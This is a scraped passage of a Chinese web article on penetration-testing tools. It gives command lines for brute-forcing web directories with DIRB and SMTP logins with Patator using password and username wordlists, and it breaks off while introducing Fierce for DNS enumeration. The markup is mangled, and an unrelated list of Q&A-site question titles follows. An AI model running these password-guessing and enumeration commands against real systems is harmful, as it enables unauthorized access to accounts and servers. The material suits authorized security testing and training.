&/code&&/pre&&/div&&h3&使用 DIRB 爆破目录&/h3&&p&注:&a href=&/?target=http%3A//dirb.sourceforge.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DIRB&i class=&icon-external&&&/i&&/a& 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的&a href=&/?target=https%3A///lanjelot/patator& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&patator&i class=&icon-external&&&/i&&/a&,&a href=&/?target=https%3A///maurosoria/dirsearch& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&dirsearch&i class=&icon-external&&&/i&&/a&,&a href=&/?target=https%3A//www.owasp.org/index.php/Category%3AOWASP_DirBuster_Project& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DirBuster&i class=&icon-external&&&/i&&/a&, 国内的御剑等等。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
&/code&&/pre&&/div&&h3&Patator – 全能暴力破解测试工具&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# git clone /lanjelot/patator.git /usr/share/patator
# SMTP 爆破
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
&/code&&/pre&&/div&&h3&使用 Fierce 爆破 DNS&/h3&&p&注:Fierce 会检查 DNS 服务器是否允许区域传送。如果允许,就会进行区域传送并通知用户,如果不允许,则可以通过查询 DNS 服务器枚举主机名。类似工具:&a href=&/?target=https%3A///lijiejie/subDomainsBrute& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&subDomainsBr}
我要回帖
更多推荐
- ·能打骚扰电话的软件很多是不是玩了这种赚钱小游戏获取你的手机号他们再卖出去?
- ·rtx2000r7 200显卡能玩什么游戏游戏吗,能开多高?
- ·航海狼人杀背包栏隐藏饥荒海难海盗帽怎么获得办
- ·魔兽争霸洛丹伦的夏天3冰封王座重回洛丹伦的文件名是什么?
- ·魔兽争霸洛丹伦的夏天3冰封王座重回洛丹伦文件名是什么?
- ·山东大学威海校区中017招收哪些专业
- ·肝胆肾结石体外碎石病,怎么治疗,求排石碎石方法。
- ·Please tellme什么意思 me what this is?
- ·什么是"胜3ds破解引导花屏"?如何来引导?它达成的标准是什么
- ·大便不通,早口干早上起来口苦口臭口干,还有口臭是什么原因
- ·轩辕传奇手游电脑版IOS电脑版 IOS电脑上怎么玩
- ·什么叫泄漏电流“暗电流”以及如何判断是否正常
- ·蚕法斗生长发育阶段到一定的阶段会变成();从()出来的蚕蛾交配产卵,蚕蛾的死亡是蚕生命的结束。
- ·精忠报国 屠洪刚??
- ·警惕自己成为慢性不抱怨 成为 政治正确者,长期不抱怨 成为 政治正确对身心有什么伤害
- ·一根火线和一根火线一根零线怎么接两个开关开关
- ·中考成绩志愿考了531分但是第三志愿不想上第二志愿没有录取有没有办法
- ·学校要评职称了,很多高中老师如何评职称都评了,我准备评但是学历不够,我在广西,
- ·如何能把这方格里的字猜字谜连成一句话祝福通顺的语句。谢谢
- ·人生只为狂与绢…品味健康人生这句话哪个字错了是谁说的
- ·o为什么会出现 git删除remote origins/origin/head
- ·五个月孩子小孩经常便秘怎么办办
- ·宝宝总是小孩子打嗝怎么办处理
- ·洪荒之以力伐天复方药?后面的字忘了?
- ·求助.谁有insanity视频 Asylum 2的课程表
- ·韧带拉伤挂什么科了怎么办
- ·清华大学留学生办公室 没有抢到宿舍 有人跟我一样吗
- ·德与人之间的关系是什么?德与人的教师个人师德修养计划方法有哪些
- ·热缩管的作用在日常生活中有什么作用
- ·桔子分期信用额度扣了,昨天短信分期房贷扣款短信信也发了,怎么到今天还是代发货
- ·每天为什么早上起来头会晕一些晕坐定又无事什么原因
- ·伊可新鱼肝油胶囊能吃吗能给宝宝吃吗
- ·西北工业大学 张开复知音之家假期开不开
- ·知道在英国一星期的顺序中每天的名称和顺序,这一教学内容适合
